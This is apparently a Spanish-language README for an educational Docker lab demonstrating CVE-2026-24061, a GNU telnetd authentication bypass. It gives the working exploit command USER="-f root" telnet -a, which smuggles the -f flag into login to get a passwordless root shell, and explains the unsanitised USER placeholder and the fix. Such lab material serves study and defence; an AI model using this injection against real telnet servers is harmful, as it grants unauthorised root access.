
# Laboratorio educativo de Docker que demuestra CVE-2026-24061, una omisión de autenticación en GNU telnetd que permite acceso root mediante inyección de argumentos en la variable de entorno USER.
Este repositorio contiene un laboratorio simple en Docker para demostrar la vulnerabilidad CVE-2026-24061. Permite eludir la autenticación y obtener acceso como root en GNU telnetd, en Linux.
El objetivo es exclusivamente educativo.
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
En otra terminal, ejecute:
USER="-f root" telnet -a localhost 2323
Después de esto, el acceso se concederá directamente como root, sin solicitud de contraseña.
La falla ocurre debido a una inyección de argumentos durante la invocación de la utilidad /usr/bin/login. El telnetd construye dinámicamente la línea de comandos utilizada para llamar a login e incluye el valor de la variable de entorno USER mediante el marcador de posición %U, sin ninguna sanitización.
Como la utilidad login acepta la opción -f, que ignora la autenticación por contraseña, un atacante puede definir USER="-f root" y forzar el inicio de sesión directo como root.
Como el telnetd se ejecuta con privilegios elevados, esta manipulación resulta inmediatamente en una shell root sin necesidad de credenciales válidas. La explotación es simple, no requiere interacción previa y puede automatizarse fácilmente, lo que justifica la puntuación CVSS 9.8.
La vulnerabilidad fue corregida con la introducción de validación y sanitización de la variable USER, bloqueando valores que comienzan con guion y caracteres especiales, impidiendo la inyección de argumentos en login.